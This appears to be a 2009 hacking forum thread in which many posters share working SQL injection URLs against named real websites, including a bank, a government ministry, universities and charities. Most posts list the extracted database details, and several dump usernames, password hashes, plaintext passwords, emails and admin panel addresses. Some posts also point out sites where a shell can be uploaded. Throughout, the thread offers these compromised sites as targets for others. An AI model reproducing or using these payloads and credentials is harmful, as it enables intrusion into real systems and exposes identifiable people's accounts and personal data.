//5 - hmin

--------------------------------------------------------------------------------

ztotztot


supernews

Rubaka
11.05.2009, 22:55
http://www.monadgarden.com/andy/paper.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*

Database Version: 4.0.27-standard-log
Database name: db199351466
User name: dbo199351466@74.208.16.162

udman
11.05.2009, 23:02
http://www.4baby.com.ua/index.php?id=-6373+union+select+concat_ws(0x0b,us er(),database(),versi on())


dbuser@localhost
ababycom_4baby
4.1.22-log

DezMond™
11.05.2009, 23:17
http://www.catalogs.ohio.edu/preview_entity.php?catoid=4&ent_oid=-199+union+select+1,version(),3,4,5,6,7,8,9/*

4.1.22-log

SecreT
12.05.2009, 00:01
http://www.seruven.org/haber.php?id=-1/**/union/**/select/**/0,version(),database(),yazar,4,5%20from%20seruven/*

seruvenorg@77.92.153.64
4.0.27-log

Rubaka
12.05.2009, 01:32
http://www.visions.ab.ca/display.php?id=-18+union+select+1,2,3

Database Version: 5.0.67
Database name: wordpress_visions_ab_ca
User name: visionsabc387943@64.29.146.101

HAXTA4OK
12.05.2009, 08:40
TIC: 100
PR: 4

http://www.santo.kz/modules.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user())/*

4.0.18-nt:santo:mysanto@localhost

ILYAtirtir
12.05.2009, 08:57
AS "SMP Bank"
http://www.multibanka.ru/rus/news/?id=-38'+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),user(),version()),8,9,10,11,12+--+
multibankalv:root@localhost:5.0.75

http://www.multibanka.ru/rus/news/?id=-38'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,p assword,host),8,9,10,11,12+from+mysql.user+--+
root::localhost
nagios:*82802C50A7A5CDFDEA2653A1503FC4B8939C4047:c trl-03.mbint.multibanka.com
itd-02:*DF4EA3C83AF5CE947137A411CE429A98F48DF5DB:itd-02.mbint.multibanka.com
pavel:*B7B226482D498A9332C576AFD91B702B57C1069E:lo calhost
external-sql:*91C46317B0053BE203105DD885E9B0B73B4E0C43:

Reglament Publishing House
http://www.reglament.net/about/?-info'/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,database(),user(),versi on()),8,9,10/*
amir:amir@zvm17.host.ru:4.0.27-log

HAXTA4OK
12.05.2009, 12:45
http://www.firework.kz/longnews.php?id=1+union+select+1,2,3,concat_ws(0x3 a,version() ,database(),user())--

5.0.77-log:firework_pyros:firework_PYr0mAn@localhost

tables:
cnt

data

menu

news

posts

topics

users

a hell of a lot of users, but the site is lame ))

http://www.firework.kz/longnew s.php?id=1+union+select+1,2,3,concat_ws(0x3a,id,ni ck,pass,rank,fio, mail,tel)+from+users--

admin:

1:admin:adW0rk:admin:Администратор:ad min@firework.kz:+7 727 2421216

DezMond™
12.05.2009, 17:04
http://www.remix07boston.com/articles.php?categid=568828&articid=-568844818+union+select+1,group_concat(strLogin,cha r(58),strPassword,char(58),AccountType),3,4,5,6+fr om+tblaccount--

mailbrush
12.05.2009, 20:28
http://www.duelofages.com/history/character.php?ID=1
phpDOA@localhost:DOA:3.23.58
Blind...

HAXTA4OK
12.05.2009, 20:49
http://web.xnet.kz/info.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

xnetkz_xnet:xnetkz_xnetuser@localhost:5.0.75-log


users:


http://web.xnet.kz./info.php?id=-1+unio n+select+1,group_concat(concat_ws(0x3a,login,pass _md5)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+fro m+clients+limit+0,1--

mailbrush
12.05.2009, 20:52
http://www.top10cartoons.com/character.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
dbo241580350@74.208.16.173:db241580350:4.0.27-max-log

HAXTA4OK
12.05.2009, 21:02
TIC: 90
PR: 5

http://www.dknews.kz/toplink.php?id=1+union+select+1,concat_ws(0x3a,dat abase(),user(),version()),3,4,5--

dknewsk_manat:dknewsk_new@localhost:5.0.67-community

######################################

http://www.fomin.kz/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),u ser(),ve rsion()),5,6,7,8,9--

fominkz_fomin:fominkz_admin@localhost:5.0.75-log

mailbrush
12.05.2009, 21:12
http://www.ergoproxy.ru/character.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version())proxy@localhost:proxy:5.0.77

HAXTA4OK
12.05.2009, 21:17
TIC: 30
PR: 4

http://www.fbs-rk.kz/index_r.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4--

db_fbs:us_fbs@localhost:4.1.22-standard

Rubaka
12.05.2009, 22:08
http://www.os-forum.com/minix/net/code-display.php?filenameid=88/**/UNION/**/SELECT/**/1

Database Version: 4.0.27-max-log
Database name: minix
User name: minix@208.109.78.134

http://www.ralstonrealestate.com/display.php?action=listing_detail&PID=12/**/UNION/**/SELECT/**/1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18

Database Version: 4.0.27-max-log
Database name: rrweb
User name: rrweb@208.109.14.136

HAXTA4OK
12.05.2009, 22:36
http://www.stom-d.kz/link.php?id=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4--&rz=z


goldflou_stomed:goldflou_goldflo@localhost:5.0.75-log

Rubaka
12.05.2009, 22:39
http://boothextrusions.com/display.php?pID=8/**/UNION/**/SELECT/**/1,Version(),3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: booth_booth
User name: booth_booth@localhost

mailbrush
12.05.2009, 23:07
http://www.vegetables.co.nz/vegetable.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11dcom@ws7.int.mydns.n et.nz:dcom_vegfed:4.0.27-standard-log

DezMond™
13.05.2009, 00:41
http://www.lawguru.com/cgi/bbs/user/faq.cgi?id=-117+union+select+1,2,3,4,5,6,group_concat(username ,char(58),password,char(58),email),8,9,10,11+from+ emesgUsers/*
mitzi:3aZR9CRL:debmin96@hotmail.com

http://www.lawguru.com/cgi/bbs/user/faq.cgi?id=-117+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,admi nid,password),8,9,10,11+from+admin/*
admin::beatall123

If anyone finds the admin panel, please PM me.

http://www.dsni.co.uk/eventdetails.php?id=-313'+union+select+1,table_name,3,4,5,6,7,8+from+in formation_schema.tables+--+

Rubaka
13.05.2009, 08:16
http://www.sglaw.com/employment_law.php?pid=6/**/UNION/**/SELECT/**/1,2,3,4/**/LIMIT/**/1,1/*

Database Version: 5.0.32-Debian_7etch6-log
Database name: sglaw
User name: timferrell@web2.msomt.modwest.com

DezMond™
13.05.2009, 10:06
http://www.dsni.co.uk/eventdetails.php?id=312'+union+select+1,table_name ,3,4,5,6,7,8+from+information_schema.tables+--+
No tables with users(

HAXTA4OK
13.05.2009, 11:48
http://pulsradio.ru/modules/_reklama/index.php?sub&id=-1+union+select+1,version()#

5.0.67-community-log

there are filters in place)

#####################################
"MINISTRY OF COMMUNICATIONS AND INFORMATIZATION OF THE REPUBLIC OF BELARUS"

TIC: 170
PR: 7


http://www.mpt.gov.by/new/modules/de livsp/index.php?sub&id=1+unio n+select+1,versi on()

4.1.22

FILTERS AGAIN)))

DezMond™
13.05.2009, 12:29
PR7
http://www.allgame.com/character.php?id=1704'+union+select+1,concat(user, char(58),password),3,4+from+mysql.user+--+
root *25F49005CFA966D47EFBF9A8FFE15F72A8352AAA

http://www.allgame.com/character.php?id=1704'+union+select+unhex(hex(tabl e_name)),2,3,4+from+information_schema.tables+limi t+128,1000+--+
Didn't find any useful tables(

HAXTA4OK
13.05.2009, 12:54
PR: 3
http://aven-tour.ru/plus/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5

5.1.32-community-log:aventou_aven:aventou_aven@91.195.124.9

DezMond™
13.05.2009, 13:53
http://central-jkt.sch.id/detail_news.php?id=-31+union+select+1,concat(IDUser,char(58),UserID,ch ar(58),UserPassword),3,4,5+from+tbl_admin/*

1:websekolah:068b89878cc7a5518beb601ee1c7c7d1

Lam3rsha
13.05.2009, 14:04
http://allo-mebel.ru/shop/?dir=62+union+select+1,2,3, 4,5,6,7,8,9/*


Database Version: 4.1.22
Database name: allo_mebel_ru
User name: allo-mebel_mysql@212.193.233.212

Kimliksiz
13.05.2009, 15:11
Powered by Smoothflash SQL injection


http://www.gregperkins.com/smoothflash/admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

kc9ghz:5a31b9d36acbc873dd1d4f1583abc348
???

mailbrush
13.05.2009, 18:07
http://www.hellados.ru/pic.php?id=1
user():database():version()
hellados@zvm18.host.ru:hellados:3.23.58
Blind...

HAXTA4OK
13.05.2009, 18:09
TIC: 170
PR: 5

http://museum.pereslavl.ru/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/*

5.0.32-Debian_7etch5-log:pzmuseum:pzmuseum@localhost

$n@ke
13.05.2009, 19:42
http://iiichan.net/index.php?post=1242184682+and+substring(version(), 1,1)=5--
version 5.0.67-log
user humblefool

rushter
13.05.2009, 21:15
http://www.ksou.com.cn/news/cat.php?id=-39+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--&language=1
4.0.26-standard:msearch:ksou@localhost PR5

winstrool
14.05.2009, 11:11
_http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,version(),datab ase(),user()),3--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

5.0.22:admin_sidb:admin_sidb@localhost

the info can be seen in the page source, in the tag


<title>SIDEKO.RU - ротанг и высококачественная плетеная мебель из ротанга в розницу, оптом и на заказ. Мягкая плетеная мебель из ротанга. :: Магазин*»**»*5.0.22:admin_sidb:admin_sidb @localhost</title>

_http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,name,uname,emai l,pass),3+from+kpro_user--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

Администратор:Administrator:eshop@sid eko.ru:adc2db1bff610b3d8273936236558883

HAXTA4OK
14.05.2009, 11:47
http://smgroup.kz/index.php?opt=main&id=-1+union+ select+1,2,version() ,4,5 --

5.0.67-community

tables:news,users,admin,answers,menu

http://smgroup.kz/index.php?opt=main&id=-1+unio n+select+1,2,group_concat(concat_ws(0x3a,login, parol)),4,5+fr om+admin--

admin:pass
admin:1234

winstrool
14.05.2009, 14:46
_http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3+--
5.0.77:restoran27:restoran27@localhost


_http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,login,pass),3+fr om+users+limit+0,1--
Rem-x:38166fa5a6b227dd6b4a7cb415095520

hash:260280

RulleR
14.05.2009, 16:01
[PR 3]
http://www.ultramarine.com.ua/info.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())
4.1.22-log:ultramar:u_redact@localhost

mssql-inj

[PR 5]
http://www.sparkle.com.tw/product.asp?id=94+or+1=@@version--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+db_name())--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+system_user)--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+top+1+table_name+fr om+information_schema.tables)--

[PR 4]
http://www.thinklogical.com/product.asp?ID=49+or+1=@@version--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+db_name())--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+system_user)--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+top+1+table_name+fr om+information_schema.tables)--

DezMond™
14.05.2009, 17:06
Edu PR4
http://zone.missouri.edu/schedule.php?semester=Fall&year=-2008+union+select+1,2,3,4,5,concat_ws(0x3a3a,usern ame,password,level),7,8,9,10,11,12,13,14+from+admi n+/*+

tmeans::pass::0
zone_mentors::zonefolks::0

http://zone.missouri.edu/Admin/

jecka3000
14.05.2009, 18:42
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

farex
14.05.2009, 18:45
<<Novosibirsk business portal>>
http://www.novosib.ru/market/offer.php?id=-2579+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),0 ,1,2,3,4,5--+

4.1.22-log:novosib8_mamba:novosib8_sgv@localhost:portbld-freebsd6.1

SecreT
14.05.2009, 19:52
http://www.organicavenue.com/products/news.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,database(),user(),7,8,9,10 from products/*

products
denisemari@localhost


http://www.hardwarehaber.com/haberbak.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,user(),version(),10,11,12,1 3,14,15,16/*

hardwarehaber
root@localhost
5.0.32-Debian_7etch3-log



http://www.aysu.de/haber.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,user(),24,25,26,27,28,29/*

dbaysu_1
aysu@localhost

Krist_ALL
14.05.2009, 19:56
Yurist newspaper.
PR - 5

user() - u74105@10.10.223.75
database() - u74105_yur
version() - 5.0.67-log
@@version_compile_os - unknown-freebsd6.3

http://www.gazeta-yurist.ru/article.php?i=-397+union+select+version(),user(),3,4,5,6++--

DezMond™
14.05.2009, 20:01
Edu PR6
http://www.sierranevada.edu/pictures/photo/?aid=-191'+union+select+1,2,3,concat(username,char(58),p assword),5,6,7+from+usr+--+&index=2
rstriffler:16908b0605f2645dfcb4c3a8d248cef3:80 - events
CindyM:bccef78390596a8a3069b548b9c9214f:32 - incline
SchuylerH:bccef78390596a8a3069b548b9c9214f:33 - incline
.....................

Велемир
14.05.2009, 21:20
Naval battles

http://navyfield.ru/index.php?page_id=1'+or+1=@@version--

http://navyfield.ru/index.php?page_id=1'+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('phpbb_bots'))--

No MSSQL dumper... so I can't be bothered :(

P.S.: I have a feeling this is such an old repost that it's ridiculous...

HAXTA4OK
14.05.2009, 22:22
http://www.foodplus.ae/menu.php?id=1+union+select+1,concat_ws(0x3a,versio n(),datab ase(),u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27--

5.0.75-community-log:fanzplus_foodplus:fanzplus_foodp@localhost

P.S. For some reason I can't find the tables =\

---------------------------------------------------------------------------
PR: 3

http://www.ae-concrete.com/productchar.php?id=-1+union+select+concat_ws(0x3a,ve rsion(),database(),us er()),2--

4.1.22-standard:db_aeconcrete:db_aeconcrete_97@localhost

----------------------------------------------------------------------------
PR: 5

http://www.go-green.ae/link.php?id=1+union +select+1,2,3,concat_ ws(0x3a,version(),database(),us er()),5,6,7/*

4.1.21:gogreen:gogreen@localhost


-----------------------------------------------------------------------------


http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,concat_ws(0x 3a,version(),databas e(),user()),3--

5.0.67-community-log:huda_houda:huda_userhuda@localhost



http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,Admin _ID,Admin_Nam e,User _Name,P as sword,Email)),3+from+admin+limit+0,1--


admin :
1:Administrator:h uda123:huda_123:b assam@dowgroup.com

mailbrush
15.05.2009, 00:11
http://www.safariclub.ru/field.php?action=view&id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13--&status=1
netsoft@localhost:netsoft_safari:5.0.45

PR: 4
TIC: 100


http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4--
patrioty_patriot@localhost:patrioty_paintball:5.0. 67-community

http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4+from+users_cp--
10:admin:dfer54

http://patrioty.info/admin/ - admin panel. A shell can be uploaded =)

DezMond™
15.05.2009, 00:43
PR6
http://nccsdataweb.urban.org/faq/detail.php?linkID=-805+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12,13+from+mysql.user+limit+1,1/*&category=9
jdurnford::1030bc2d72167683

http://www.avalonmicro.ca/products/index.php?Category=-6+union+select+table_name+from+information_schema. tables+--+
user_registration

http://www.amprofon.com.mx/noticias.php?id=-12+union+select+1,2,user,4+from+usuarios--
apcmmexico

Kimliksiz
15.05.2009, 03:32
Joomla com_akogallery

http://www.kaminfeger.com/index.php?option=com_akogallery&Itemid=51index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

admin c564660bacebedf0e02d3a409f29cd5b ??????


http://www.wenatcheecares.org/user.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_nickna me,user_passwd),6,7,8,9,10,11+from+users

Pastor Andrew:547d4e455674d06bd4d40475796f6944 pass : wencares

http://www.wenatcheecares.org/login.php

HAXTA4OK
15.05.2009, 08:18
http://marbag.ae/index.php?id=-1'+union+select+1,concat_ws( 0x3a,version(),da tabase(),user()),3/*&lang=ru

5.0.27:marbag:mbae-mysql@localhost

########################################

http://www.aestockholm.se/ae.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa s e(),use r()),4,5/*

5.0.45-log:bungy_se:bungy_se@b7593@s73.loopia.se


http://www.aestockholm.se/ae.php?id=-1+union+se lect+1,2,group_concat(concat_ws(0x3a,id,user,pass) ),4,5+from+login+li mit+0,1/*

admin:
1:bungeelocos:pitepalt
2:jp:pansarpung

http://www.aestockholm.se/admin/

vasyan
15.05.2009, 13:20
http://www.gradschool.cornell.edu/index.php?p=-1+union+select+1,2,3,4,5,concat_ws(version(),datab ase(),user()),7,8,9,10,11,12--

Kimliksiz
15.05.2009, 13:38
http://www.digischool.nl/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

Fred Capel-240430a0ea35050f1dea47d2a13d3be4 ???

admin panel

http://www.digischool.nl/gcards/login.php

HAXTA4OK
15.05.2009, 15:05
http://www.er.com.my/Content.php?id=1+union+select+concat_ws(0x3a,versi on(),database(),user()),2,3,4/*

4.1.22-standard-log:excellent_dat:excellent_root@localhost

DezMond™
15.05.2009, 15:08
PR5
http://colesfrenchdip.com/ecard/getnewsitem.php?newsid=-10+union+select+1,2,version(),4,5/*
4.1.20

http://lnx.rosadesign.net/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
1::admin::08cd706ca61375c02a47b6ea26c66aba::email

http://www.yosy.nl/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
4::admin::21232f297a57a5a743894a0e4a801fc3::email

http://www.npac.org.hk/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
1::admin::42c533c57a1cde61c47fe293e72beea3::sysadm in@npac.org.hk - npnimda7

HAXTA4OK
15.05.2009, 15:15
http://www.er-ekeksiogluinsaat.com/ru/urunic.php?id=1'+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6,7/*

4.1.22:ereksiru:ereksiru@localhost


#####################################
PR: 4

http://www.opendoors.nl/content/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16, conca t_ws(0x3a,version(),database(),user()),18,19,20,21 ,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47--&isocodeselect=er

5.0.32-Debian_7etch8-log:dbcmsnl:nlsu@nas01

farex
15.05.2009, 17:37
<<Wine encyclopedia>>
http://www.shai.dp.ua/enciclopedia/index.php?GID=-12+union+select+1,2,concat_ws(0x3a2a3a,version(),d atabase(),user(),@@version_compile_os),4,5,6,7,8,9 ,0,1/*
5.0.32-Debian_7etch5-log:*:shai:*:shai@localhost:*:pc-linux-gnu

HAXTA4OK
15.05.2009, 18:01
PR: 5

http://www.infopal.it/pagine.php?id=1'+union+select+1,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),3/*

4.1.20:infopal:infopal@localhost:redhat-linux-gnu

@@version_compile_os - is it worth including?

mailbrush
15.05.2009, 18:01
http://rebeccaallen.com/v2/work/work.php?ID=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37--
rallen_user@localhost:rallen_db:5.0.45

Gorev
15.05.2009, 18:04
PR4
http://www.codexpert.ro/stiri.php?stire=23+UNION+SELECT+1,convert(concat_w s(0x3a,version(),database(),user(),@@version_compi le_os)+using+latin1),3,4,5--


Database Version: 5.0.67-community
Database name: rcod5157_main
User name: rcod5157_cilu@localhost
Os: redhat-linux-gnu

the tables are all output at once...
http://www.codexpert.ro/stiri.php?stire=23+UNION+SELECT+1,convert(TABLE_NA ME+using+latin1),3,4,5+FROM+INFORMATION_SCHEMA.TAB LES--

HAXTA4OK
15.05.2009, 18:22
PR: 5

http://www.euro2009.it/service_page.php?Id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), datab ase(), user(), @@version_compile_os),7,8,9,10,11,12,13,14,15,16--

5.0.32-Debian_7etch8-log:euro2009:euro2009@localhost:pc-linux-gnu


http://www.euro2009.it/service_page.php?Id=-1+union+select+1,2,3,4,group_concat(concat_ws(0x3a ,Login,Pa ssword )),6,7,8,9,10,11,12,13,14,15,16+from+A ccount+limit+0,1--



################################################## #

http://www.abcdtv.it/pagina.php?id=-1+union+sele ct+1,2,3,concat_ws(0x3a,version(),databa se(),user (),@@version_compile_os),5,6,7--

4.1.22:abcdtv01:abcdtv01@localhost:portbld-freebsd6.2

DezMond™
15.05.2009, 20:03
PR8
http://web.iyte.edu.tr/mechweb/research_areas/publications.php?id=-5+union+select+version()+from+information_schema.t ables+/*+
5.0.45
If anyone digs further, PM me

HAXTA4OK
15.05.2009, 20:47
TIC: 80
PR: 4

http://www.color-it.net/news.php?id=111111+union+select+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7--

4.1.22-log:wwwant_hostnet_colorit:anthost@localhost:portb ld-freebsd6.2

###########################################

PR: 4

http://www.itemweb.it/index.php?load=work&id=-1'+union+select+1,2,con cat_ws(0x3a,version(),database(), user(),@@version_compile_os),4,5,6,7,8,9,10,11,12, 13/*&lang=en

5.0.32-Debian_7etch6-log:item:item@localhost:pc-linux-gnu

###########################################
PR: 3

http://www.teatrodelsuono.it/equipe.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),databa s e(),us er(),@@version_c ompile_os),4,5,6,7,8,9--

5.0.51a-3ubuntu5.4:teatro:web@localhost:debian-linux-gnu

tables true : t_admins
P.S. work it yourselves

#######################################
PR: 5

http://www.tass-it.ru/index.php?page=contacts&id=-1+union+select+1,versio n(),3,4--

5.0.67

tables:
columns_priv,time_zone_name,procs_priv,help_relati on,db,time_zone_transition,tables_priv,help_topic, func,time_zone_transition_type,time_zone,host,help _category,user,time_zone_leap_second,proc,help_key word

###########################################
PR: 4

http://datahop.it/item_details.php?id=1+union+sele ct+1,2,concat_ws(0x3a,version(),database(),use r(),@@version_compile_os),4,5,6,7,8,9,10/*

4.0.20-Max:datahop:datahopuserphp@www.datahop.net:pc-linux


P.S. A HUMAN IS JUST ONE BIG SQL QUERY OF GOD'S (C)


########################################
PR: 3

http://www.altesino.it./en/vino.php?id=-1'+u nion+select+1,2,3,group_concat(table_name),group_c o ncat(table_name),6,7,8+from+information_sc hema.tables+group+by+table_schema+limit+1,1/*

5.0.37-community-nt:altesino:altesino@localhost:Win32

tables:
sessioni,testi,distributori,vini,utenti,news,premi

P.S. LIFE IS LIKE THE INTERNET: SOMETIMES IT LAGS (C)

#########################################
http://www.intelli-it.de/intelli_it.php?id=-1+union+se lect+1,2,3,concat_ws(0x3a,versio n(),databas e(),user(),@@version_compile_os)--&lang=en

5.0.32-Debian_7etch10-log:intelli_itde:intelli_itde@localhost:pc-linux-gnu

#########################################
PR: 3

http://www.allacortedelvino.it/dettnews.php?id=-1'+union+select+1,2,concat_ws(0x3a ,version(),database(),use r(),@@version_c ompile_os),4,5,6,7,8,9,10,11/*

5.0.27:allacortedelvino-it:allacortedelvino@localhost:redhat-linux-gnu

#########################################
PR: 4

http://www.sprint-it.com/index.php?action=trainer&id=111111111'+union +select+1,2,3,concat_ws(0x3a,version(),database(), use r(),@@version_com pile_os),5,6,7,8,9,10,11,12,13/*

5.0.45-log:0030_scrumeducations:0030d001@baerentatze.25th-floor.com:redhat-linux-gnu

########################################
PR: 3

http://www.lupotto.it/descr_corso.php?id=-1+union+select+1,concat_ws(0x3a,version(), database(),us er(),@@version_compil e_os),3,4,5,6,7/*

4.1.23-pro-gpl-log:lupotto_it_site:GL5352_root@81.88.49.7:unknown-linux-gnu

#########################################
PR: 2

http://www.my-it.info/internetsme_section.php?id=-1+union+select+1,concat_ws(0x 3a,version(),database() ,user(),@@ version_compile_os),3,4--

5.0.51a-3ubuntu5.4-log:myit:myit@localhost:debian-linux-gnu

Skofield
16.05.2009, 01:25
http://www.microbric.com {PR 5}
http://www.microbric.com/page.php?sId=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2/*

4.1.22-STANDARD : MICROBR_IBOT : MICROBR_IBOT@LOCALHOST

HAXTA4OK
16.05.2009, 08:05
http://www.goldenstars.it/sk_stallone.php?id=-1+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8 ,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52/*&lang=E

5.0.32-Debian_7etch10:web2_db1:web2_u1@localhost:pc-linux-gnu

#######################################

http://www.assure-it.co.uk/jobs.php?id=19+union+select+1,2,3,4,5,6,concat_ws( 0x3a,version(),da tabase(),user(),@@version_comp ile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--

5.0.18-nt:assureit:assure-it@localhost:Win32

tables: users pages news jobs

#########################################

PR: 6

http://www.ispionline.it/eng/school.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6/*

4.0.14-standard-log:ispionline:ispi@localhost

#########################################
PR: 3

http://www.valiani.com/accessories_detail.php?ID=1+union+select+1,2,3,con cat_ ws(0x3a,vers ion(),database(),use r()),5,6,7--

4.1.22-standard-log:valiani_com_db1:AB15313_valcom@81.88.49.12


PR: 5

http://www.architetturadelmoderno.it/main.php?id=-1+union+select+1,2,3,4,5,6,7,versi on(),9,10,11,12 ,13--&lang=_eng

tables:stop_words,autori,sito_menu_nav,log_query,i ndicazioni_stradali,tipologie,comuni,sottotipologi e,nodi,info_nodo,tipologie_interventi,cronologie,s pecifiche,province,itinerari_speciali,utenti,crono logie_to_nodi_to_autori,specifiche_to_nodi,regioni ,itinerari_speciali_to_nodi,files

akk : utenti;

http://www.architetturadelmoderno.it/main.php?id=-1+un ion+select+1,2,3,4,5,6,7,group_concat(concat_ws(0x 3a,us er_id,p assword)),9,10,11,12,13+from+utenti+limit +0,1--&lang=_eng

:( ????

http://www.architetturadelmoderno.it/admin/

DezMond™
16.05.2009, 13:58
http://www.neiljenkins.com/opera.php?op=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,password ,email,level),5,6,7+from+users+--+&id=opera1

http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter

Gorev
16.05.2009, 14:57
Pagerank: 5
http://www.radiobucuresti.ro/stire.php?id=-631+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7


Database Version: 5.0.67-log
Database name: rb2
User name: rb@localhost
Os: slackware-linux-gnu

DeepXhadow
16.05.2009, 14:57
http://www.scenic-circle.co.nz/hotel.asp?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102,103,104+from+news

Microsoft JET Database Engine

Whoever brute-forces any tables other than news and Hotels, post a reply :)

Dimionx
16.05.2009, 15:35
www.ltefdonations.org

http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7

Version - 5.0.75-community-log
User - ltefdona_collect@localhost
DB - ltefdona_collector

Users (93 in total):

http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword,email),6,7+from+users+limit+1,1

Admin panel:
http://ltefdonations.org/admin/index.php

Name:minznerjosh
Pass:gateway400

mailbrush
16.05.2009, 15:46
